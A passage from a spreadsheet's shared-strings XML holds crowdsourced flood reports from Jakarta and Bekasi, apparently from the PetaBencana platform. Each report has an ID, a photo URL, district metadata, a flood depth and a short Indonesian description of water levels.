    <t>{ "district_id": "3172", "local_area_id": "1455", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>f3658f0b-5e7f-4f07-92ac-13c89f4ad5ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f3658f0b-5e7f-4f07-92ac-13c89f4ad5ad.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1454", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>305cb8d2-2ea7-4771-877e-6121a647362a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/305cb8d2-2ea7-4771-877e-6121a647362a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "546", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Percetakan Negara banjir sebetis</t>
  </si>
  <si>
    <t>d0107fa9-2ec6-40b9-b7fa-f9e09f4e0780</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d0107fa9-2ec6-40b9-b7fa-f9e09f4e0780.jpg</t>
  </si>
  <si>
    <t>Rumah asli tidak di tinggikan</t>
  </si>
  <si>
    <t>b449faa8-e035-4230-9fac-8718750a27f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b449faa8-e035-4230-9fac-8718750a27f6.jpg</t>
  </si>
  <si>
    <t>banjir sudah sampai diatas dengkul orang dewasa. listrik dan air masih nyala.</t>
  </si>
  <si>
    <t>7e482996-5698-4db5-9be0-85e568b12c10</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7e482996-5698-4db5-9be0-85e568b12c10.jpg</t>
  </si>
  <si>
    <t>air menggenang</t>
  </si>
  <si>
    <t>c4b08fb0-5e91-45be-91b4-df724220d187</t>
  </si>
  <si>
    <t>Banjir lagi setelah kejadian malam tahun baru. Tidak pernah tahu apa penyebabnya, dan entah kelurahan mengetahui atau tidak soal ini.</t>
  </si>
  <si>
    <t>5000c46a-6fd7-4694-a224-7cb6cacade15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5000c46a-6fd7-4694-a224-7cb6cacade15.jpg</t>
  </si>
  <si>
    <t>Ini di dlm rmh, diluar lebih tinggi</t>
  </si>
  <si>
    <t>bec5482c-6ebf-4e82-8349-c7dbc1e42627</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bec5482c-6ebf-4e82-8349-c7dbc1e42627.jpg</t>
  </si>
  <si>
    <t>Banjir selutut org dewasa. Air sudah masuk ke banyak rumah</t>
  </si>
  <si>
    <t>0bb8aad6-8977-4bed-8062-6b84680167d0</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1551", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kelapa Gading Banjir lagi</t>
  </si>
  <si>
    <t>39709a68-71ad-43bc-9709-426334423e98</t>
  </si>
  <si>
    <t>https://images.petabencana.id/39709a68-71ad-43bc-9709-426334423e98.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1349", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>10 tahun tinggal disini, banjir paling parah cuma semata kaki kurang. Sekarang, sedengkul..</t>
  </si>
  <si>
    <t>684a0794-7c7b-4636-8ffe-e1bb4b60e521</t>
  </si>
  <si>
    <t>https://images.petabencana.id/684a0794-7c7b-4636-8ffe-e1bb4b60e521.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 59, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jl kelapa tinggi rw 08 rt 006</t>
  </si>
  <si>
    <t>5a4df55a-2e77-4010-87dc-57a0f6058506</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2171", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Baru tahun ini ngalamin banjir parah, selama 15tahun tinggal sini</t>
  </si>
  <si>
    <t>fae417f0-1232-4f00-9b42-c0f615492c9e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fae417f0-1232-4f00-9b42-c0f615492c9e.jpg</t>
  </si>
  <si>
    <t>bahkan ular masuk ke rumah</t>
  </si>
  <si>
    <t>d24e487c-9647-4d87-9281-46cf32e52a91</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d24e487c-9647-4d87-9281-46cf32e52a91.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1691", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi 40-50cm</t>
  </si>
  <si>
    <t>12ffe78f-9ca0-47ab-ba87-bf9d04930a03</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12ffe78f-9ca0-47ab-ba87-bf9d04930a03.jpg</t>
  </si>
  <si>
    <t>Air semakin tinggi</t>
  </si>
  <si>
    <t>935afb7e-d396-471c-a006-327b0d628687</t>
  </si>
  <si>
    <t>https://images.petabencana.id/935afb7e-d396-471c-a006-327b0d628687.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1037", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jl. Tipar Cakung Kelurahan Cakung Barat Kecamatan Cakung Jakarta Timur Rt.003/Rw.005 Ketinggian mulai dari 50cm"</t>
  </si>
  <si>
    <t>f13d233e-98e8-4e15-9b0e-c734b78e4d48</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f13d233e-98e8-4e15-9b0e-c734b78e4d48.jpg</t>
  </si>
  <si>
    <t>a715a1c3-b1b8-43d5-98e2-c5e15b724322</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a715a1c3-b1b8-43d5-98e2-c5e15b724322.jpg</t>
  </si>
  <si>
    <t>Janur Asri. 30 cm.</t>
  </si>
  <si>
    <t>b5e18d0e-1e8a-47ee-8b28-e95e8fe663e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b5e18d0e-1e8a-47ee-8b28-e95e8fe663e7.jpg</t>
  </si>
  <si>
    <t>Pulo Gebang Permai banjir semata kaki</t>
  </si>
  <si>
    <t>380adee5-ae44-4870-8128-d08f214df4d8</t>
  </si>
  <si>
    <t>Masuk rumah sebetis</t>
  </si>
  <si>
    <t>a9a3cb3c-5c9e-4d91-b0d3-6e4ba3eaa5d6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9a3cb3c-5c9e-4d91-b0d3-6e4ba3eaa5d6.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2085", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ini sudah banjir yang ketiga di 2020. Tapi ini lebih parah dari tahun baru kmarin</t>
  </si>
  <si>
    <t>42e69952-2135-42e5-8f9d-4a4f8875e2c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/42e69952-2135-42e5-8f9d-4a4f8875e2c2.jpg</t>
  </si>
  <si>
    <t>Banjir sepaha</t>
  </si>
  <si>
    <t>01dec276-8e86-4960-966d-a56f5665ebcf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/01dec276-8e86-4960-966d-a56f5665ebcf.jpg</t>
  </si>
  <si>
    <t>Jalan Gading Nias 9</t>
  </si>
  <si>
    <t>1fab3b67-2339-40b5-bbae-85efc110ec4a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1fab3b67-2339-40b5-bbae-85efc110ec4a.jpg</t>
  </si>
  <si>
    <t>Cluster Taman Sakura</t>
  </si>
  <si>
    <t>Babelan Kota</t>
  </si>
  <si>
    <t>206a9cc1-4ee0-4586-b580-85b1262b44e5</t>
  </si>
  <si>
    <t>Mohon dibantu sampaikan ke perangkat pemerintahan setempat, ini yg kedua dalam kurun 2 bulan terakhir.</t>
  </si>
  <si>
    <t>1aca0c3c-c28f-4d4c-ae84-da1d86bfe7e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1aca0c3c-c28f-4d4c-ae84-da1d86bfe7e3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1396", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lumayan lama surutnya</t>
  </si>
  <si>
    <t>53db9409-05d9-4353-b9be-b33b072c3e40</t>
  </si>
  <si>
    <t>https://images.petabencana.id/53db9409-05d9-4353-b9be-b33b072c3e40.jpg</t>
  </si>
  <si>
    <t>Selalu banjir bila hujan deras seharian</t>
  </si>
  <si>
    <t>470c64bb-3ba3-4110-acc6-340cd7e44053</t>
  </si>
  <si>
    <t>https://images.petabencana.id/470c64bb-3ba3-4110-acc6-340cd7e44053.jpg</t>
  </si>
  <si>
    <t>Kelapa gading , Kelapa Kopyor</t>
  </si>
  <si>
    <t>e8cd31b6-76a6-4521-9af6-8d93009473b3</t>
  </si>
  <si>
    <t>banjir 10cm</t>
  </si>
  <si>
    <t>fb1853dd-5ec7-42e3-87ea-2dc67227b41c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "597", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pdhl bertahun2 ga pernah banjir, ini tergenang langsung</t>
  </si>
  <si>
    <t>32e33b42-e053-4453-b644-54d288883b4c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32e33b42-e053-4453-b644-54d288883b4c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "649", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan air setinggi lebih dari mata kaki</t>
  </si>
  <si>
    <t>ba3acd5c-471c-4e8d-a0d3-83dc0167ad02</t>
  </si>
  <si>
    <t>Banjir tapi sudah mulai surut karena di sedot</t>
  </si>
  <si>
    <t>7f185f0f-aa1f-4552-b430-ce826b108855</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f185f0f-aa1f-4552-b430-ce826b108855.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1248", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Komplek Metland Menteng baru pertama kali banjir setinggi ini</t>
  </si>
  <si>
    <t>a9de42b5-18b4-469a-b01f-8f46f2a65d20</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9de42b5-18b4-469a-b01f-8f46f2a65d20.jpg</t>
  </si>
  <si>
    <t>Jl.cipinang latihan RT 14 RW 13 cipinang besar utara, jatinegara, jakarta timur</t>
  </si>
  <si>
    <t>aeec9bae-530f-4a2a-8198-74eddab2243b</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 64 }</t>
  </si>
  <si>
    <t>Hujan membesar ada kemungkinan ketinggian air meningkat.</t>
  </si>
  <si>
    <t>17a98e36-35ac-41fc-ba7e-01b8ffb5ed0f</t>
  </si>
  <si>
    <t>banjir terparah sepanjang tinggal disini</t>
  </si>
  <si>
    <t>e7981eb0-c0df-4df6-8750-8fe2556e1fa4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7981eb0-c0df-4df6-8750-8fe2556e1fa4.jpg</t>
  </si>
  <si>
    <t>Daerah harapan indah Blok MD sudah meluap tinggi banjir. Baru terjadi banjir lagi setelah sekian tahun</t>
  </si>
  <si>
    <t>965e9858-970a-4036-b730-462f754b9693</t>
  </si>
  <si>
    <t>https://images.petabencana.id/965e9858-970a-4036-b730-462f754b9693.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2646", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jalan ros timur V, kami anak kos memerlukan bantuan.</t>
  </si>
  <si>
    <t>c09d5c4b-343d-41d1-86ca-30f76e7d0b7e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c09d5c4b-343d-41d1-86ca-30f76e7d0b7e.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 51, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Metland Menteng Cakung</t>
  </si>
  <si>
    <t>5e4ede3e-0f51-413f-8d12-ca7f89fa1ab3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e4ede3e-0f51-413f-8d12-ca7f89fa1ab3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2356", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>update terakhir pukul 04:47. genangan air masih meluap, hujan masih santai dengan dengan derasnya, hujan 2-3Jam</t>
  </si>
  <si>
    <t>0ca8af2c-118d-4901-a4da-c82d2d183083</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2687", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalanan komplek tergenang 35 cm</t>
  </si>
  <si>
    <t>fefadb66-717d-4114-893d-9214a11ec85a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fefadb66-717d-4114-893d-9214a11ec85a.jpg</t>
  </si>
  <si>
    <t>Kali Metland Menteng</t>
  </si>
  <si>
    <t>4a696eb2-5c7a-4e1d-9942-77858f7b5de9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a696eb2-5c7a-4e1d-9942-77858f7b5de9.jpg</t>
  </si>
  <si>
    <t>Kali Kayu Mas meluap</t>
  </si>
  <si>
    <t>0aabe292-9860-4033-9fd6-3298dc443bcd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0aabe292-9860-4033-9fd6-3298dc443bcd.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1614", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jl. Pakarena, Kelapa Gading. Ketinggian air +/- &gt;50 cm</t>
  </si>
  <si>
    <t>4ff9c84b-529e-4d4d-8266-7400a6d34ab3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4ff9c84b-529e-4d4d-8266-7400a6d34ab3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2065", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Di Pegambiran arah Persahabatan dan sebaliknya</t>
  </si>
  <si>
    <t>9a0cfe1d-0249-41d7-ad76-2e0186fb4abe</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1860", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalanan sudah dipenuhi air dan genangan sudah masuk ke rumah yg sama tingginya dengan jalan..</t>
  </si>
  <si>
    <t>1ab26308-418e-4ca3-8bae-0c7b3dfe2cd9</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1351", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Banyak rumah terendam Jl Rela"</t>
  </si>
  <si>
    <t>551fdbc7-9fc5-4bc2-a314-c9a961c21f03</t>
  </si>
  <si>
    <t>https://images.petabencana.id/551fdbc7-9fc5-4bc2-a314-c9a961c21f03.jpg</t>
  </si>
  <si>
    <t>Harapan Baru Regency Blok A, B, C, D Kel. Kotabaru, Kec. Bekasi Barat, Kota Bekasi, genangan 60-100 cm</t>
  </si>
  <si>
    <t>Kota Baru</t>
  </si>
  <si>
    <t>7f4b41b2-c527-40dd-878e-f864ca03b82c</t>
  </si>
  <si>
    <t>Masuk dalam rumah setinggi dengkul</t>
  </si>
  <si>
    <t>b3f7b029-fceb-4975-80f7-9c62229f8437</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3f7b029-fceb-4975-80f7-9c62229f8437.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1991", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>JL. Pemuda 1 Rawamangun banjir akibat dari meluapnya kali Jl.Pemuda.</t>
  </si>
  <si>
    <t>d303682c-c255-4682-8eb9-64327e8c9fe4</t>
  </si>
  <si>
    <t>Banjir terparah</t>
  </si>
  <si>
    <t>cbc508cd-497f-48e7-8923-465b95605be3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cbc508cd-497f-48e7-8923-465b95605be3.jpg</t>
  </si>
  <si>
    <t>Di depan UNJ hanya bisa dilalui 1 jalur</t>
  </si>
  <si>
    <t>cd505309-9cdd-40fd-8616-80a02b989095</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cd505309-9cdd-40fd-8616-80a02b989095.jpg</t>
  </si>
  <si>
    <t>87b69cb5-8e8a-4342-b9e7-3701bb6535e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/87b69cb5-8e8a-4342-b9e7-3701bb6535e7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "696", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir selutut orng dewasa hujan dr pukul 2</t>
  </si>
  <si>
    <t>dec73f96-592a-4625-9386-7b20fe048a24</t>
  </si>
  <si>
    <t>Banjir sejak 3 dini hari</t>
  </si>
  <si>
    <t>a66a3d8c-2087-4a3b-b032-1207749f5742</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a66a3d8c-2087-4a3b-b032-1207749f5742.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "664", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ini cuma foto di depan rumah, ada yang lebih parah di daerah kampung sini</t>
  </si>
  <si>
    <t>02e99a5a-d85d-4267-84a4-ded196c44826</t>
  </si>
  <si>
    <t>659411c4-cc8d-4f30-9e7e-a3cc95bea9a4</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1423", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir kira kira diatas mata kaki</t>
  </si>
  <si>
    <t>d93b9091-c49a-4918-aa7c-51cc222fb018</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d93b9091-c49a-4918-aa7c-51cc222fb018.jpg</t>
  </si>
  <si>
    <t>Kelapa gading timur</t>
  </si>
  <si>
    <t>1f0eae58-8784-49d1-a905-3af9067641dd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f0eae58-8784-49d1-a905-3af9067641dd.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2633", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rumah yang rendah masuk ke dalam, rumah yang tinggi masih tidur. Ketinggian 50-70cm. Tiap hujan deres /3jam. Butuh bantuan makanan</t>
  </si>
  <si>
    <t>680814d4-3a62-482e-88f2-4f1485ba727f</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1499", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sedengkul</t>
  </si>
  <si>
    <t>42825345-b4d4-47ac-8c4c-bd3b83f527fb</t>
  </si>
  <si>
    <t>Knee level</t>
  </si>
  <si>
    <t>3a195b08-c3f0-4570-8b2c-0b5197d44683</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a195b08-c3f0-4570-8b2c-0b5197d44683.jpg</t>
  </si>
  <si>
    <t>89641eed-359c-4a6e-96b1-0b29a2b8160f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89641eed-359c-4a6e-96b1-0b29a2b8160f.jpg</t>
  </si>
  <si>
    <t>Kelapa Puan</t>
  </si>
  <si>
    <t>1481138d-8103-4d91-aadd-e790f6bec48a</t>
  </si>
  <si>
    <t>Komplek Gading Griya banjir selutut</t>
  </si>
  <si>
    <t>6bae054e-5286-46c1-92d9-9c6831b1e8f0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bae054e-5286-46c1-92d9-9c6831b1e8f0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1041", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>dfd84370-390a-45a4-b9f0-bae0545c5a8e</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 96 }</t>
  </si>
  <si>
    <t>Daerah cempaka putih barat  dari jam 4 pagi banjir</t>
  </si>
  <si>
    <t>6de8f4f0-9ef8-4606-9c79-3e6080fa6209</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6de8f4f0-9ef8-4606-9c79-3e6080fa6209.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "543", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ini kondisi jam 6pagi, jam 3pagi lbh tinggi lagi</t>
  </si>
  <si>
    <t>3de9f5d3-07ed-482a-a532-388f96d78965</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3de9f5d3-07ed-482a-a532-388f96d78965.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "481", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Percetakan Negara IX Jakarta Pusat</t>
  </si>
  <si>
    <t>1632aa4d-6ca8-442f-9d15-fd5124778039</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1632aa4d-6ca8-442f-9d15-fd5124778039.jpg</t>
  </si>
  <si>
    <t>6.06 sudah mulai surut</t>
  </si>
  <si>
    <t>56e1147e-a122-45df-8841-9332670fda90</t>
  </si>
  <si>
    <t>Griya Banjir Lg Mhn Hati2</t>
  </si>
  <si>
    <t>2184ae3c-e84e-46d4-8866-0af095131085</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2184ae3c-e84e-46d4-8866-0af095131085.jpg</t>
  </si>
  <si>
    <t>didalam rumah 25 cm, di jalanan depan rumah 60 cm</t>
  </si>
  <si>
    <t>f26cedee-dd0b-4130-92f2-c27445be0b8d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f26cedee-dd0b-4130-92f2-c27445be0b8d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2435", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Bajirr tlg dipompa</t>
  </si>
  <si>
    <t>2adcbff0-64c0-471b-916f-0dc017ef1c1c</t>
  </si>
  <si>
    <t>banjir terus berulang</t>
  </si>
  <si>
    <t>b40afe58-f431-4a7e-8541-bd9f9e312be9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b40afe58-f431-4a7e-8541-bd9f9e312be9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 19 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2317", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Metland Menteng Cakung Banjir</t>
  </si>
  <si>
    <t>68cf1eb6-da97-4a73-83bd-13e3ac2ecffa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68cf1eb6-da97-4a73-83bd-13e3ac2ecffa.jpg</t>
  </si>
  <si>
    <t>Rorotan gang mandiri 2 Jakarta Utara</t>
  </si>
  <si>
    <t>4a688153-d523-433b-a92a-7109c8aacd13</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a688153-d523-433b-a92a-7109c8aacd13.jpg</t>
  </si>
  <si>
    <t>paling parah, sampe masuk kedalam rumah</t>
  </si>
  <si>
    <t>639eb0cd-9d78-4d24-943b-b753405c1b60</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1273", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Arah MOI</t>
  </si>
  <si>
    <t>6fa40ee2-9e6f-4aaa-a1ac-4b1e831142d8</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 118 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1761", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir jakarta kali ini, lebih parah dari banjir tahun baru 2020</t>
  </si>
  <si>
    <t>c76cb149-d741-49ff-a9e4-e888273f131e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c76cb149-d741-49ff-a9e4-e888273f131e.jpg</t>
  </si>
  <si>
    <t>Jalan Nanas No.19,Utankayu Utara, banjir terparah, dari jam 12 malem sampe sekarang belum surut.</t>
  </si>
  <si>
    <t>9d9c31b1-136a-4006-b5e4-fef662464205</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d9c31b1-136a-4006-b5e4-fef662464205.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2090", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Semenjak banjir di tahun baru kemarin, setiap selesai hujan lebat satu malam pagi nya di pastikan terdapat genangan yang beberapa masuk ruma</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349410</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1213", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Kawasan Tebet Sudah Mulai Surut</t>
  </si>
  <si>
    <t>Akibat hujan deras semalaman, Banjir terlihat di tebet, Jakarta Selatan sejak pukul 02.00 WIB (23/02/20). Sekarang tepatnya pukul 06.40 WIB sudah mulai surut.</t>
  </si>
  <si>
    <t>ba3ba291-8311-4f88-aa2c-752dd3b388c8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ba3ba291-8311-4f88-aa2c-752dd3b388c8.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 64, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1944", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>9fd0e2cb-dd6b-42aa-a787-b7ef1c556a8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9fd0e2cb-dd6b-42aa-a787-b7ef1c556a8c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2134", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Paus Dalam , Rawamangun. Air di rumah surut, jalanan kompleks masih terendam</t>
  </si>
  <si>
    <t>bada82d7-f781-48fc-a59b-a82a5c6fc056</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bada82d7-f781-48fc-a59b-a82a5c6fc056.jpg</t>
  </si>
  <si>
    <t>Banjir se pinggang orang dewasa...</t>
  </si>
  <si>
    <t>6257a099-7147-4289-a50f-e7f5a1b2e2db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6257a099-7147-4289-a50f-e7f5a1b2e2db.jpg</t>
  </si>
  <si>
    <t>Banjir disepanjang jl.kayu tinggi , cakung timur , jakarta timur dan ketinggian banjir bisa lebih tinggi di jalan lain</t>
  </si>
  <si>
    <t>c10452f2-eac6-435d-b057-b946c5d97660</t>
  </si>
  <si>
    <t>Banjir d atas mata kaki</t>
  </si>
  <si>
    <t>61c51497-8424-4a4c-9608-7d6d8657efa3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/61c51497-8424-4a4c-9608-7d6d8657efa3.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 16, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Dini hari air naik,  adzan subuh hujan mulai reda dan mulai surut</t>
  </si>
  <si>
    <t>1691a18f-07ca-4c43-bec2-cb8542474515</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1691a18f-07ca-4c43-bec2-cb8542474515.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 42, "report_type": "flood" }</t>
  </si>
  <si>
    <t>2ba61bc7-4fe8-49b8-bf05-8f56f192ee7c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2ba61bc7-4fe8-49b8-bf05-8f56f192ee7c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "823", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Taman Pulo indah, Penggilingan. Jam 7am</t>
  </si>
  <si>
    <t>d6506353-aaae-460c-9fc8-ae3c45938b58</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1632", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air sudah masuk dari jam 03:00 sampai sekarang 07:11 dengan tinggi 20cm</t>
  </si>
  <si>
    <t>7cce55f7-4fb6-4014-8bec-96919b99ecfc</t>
  </si>
  <si>
    <t>Di depan jalanan</t>
  </si>
  <si>
    <t>3b1f283d-c80b-47fa-a234-ff7315d43b3e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b1f283d-c80b-47fa-a234-ff7315d43b3e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1460", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Perum Aneka Elok Blok D10</t>
  </si>
  <si>
    <t>5ad79c51-c263-48f7-b286-4a40f6b5e5ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5ad79c51-c263-48f7-b286-4a40f6b5e5ea.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 88 }</t>
  </si>
  <si>
    <t>9a7236fc-2594-474f-b44b-2e3789832598</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9a7236fc-2594-474f-b44b-2e3789832598.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1421", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>dfa998a1-278c-4d90-8551-4fb28daf7dd9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dfa998a1-278c-4d90-8551-4fb28daf7dd9.jpg</t>
  </si>
  <si>
    <t>2731683e-9c98-4bc1-85b3-a879e7f0cc40</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1181", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>di deket pasar kopro</t>
  </si>
  <si>
    <t>Duren Tiga</t>
  </si>
  <si>
    <t>0aa0e3d1-507c-49aa-bb23-82e43664caec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0aa0e3d1-507c-49aa-bb23-82e43664caec.jpg</t>
  </si>
  <si>
    <t>Pulogebang Permai</t>
  </si>
  <si>
    <t>3104c10b-c2eb-4911-98a2-cfe566e2a8fc</t>
  </si>
  <si>
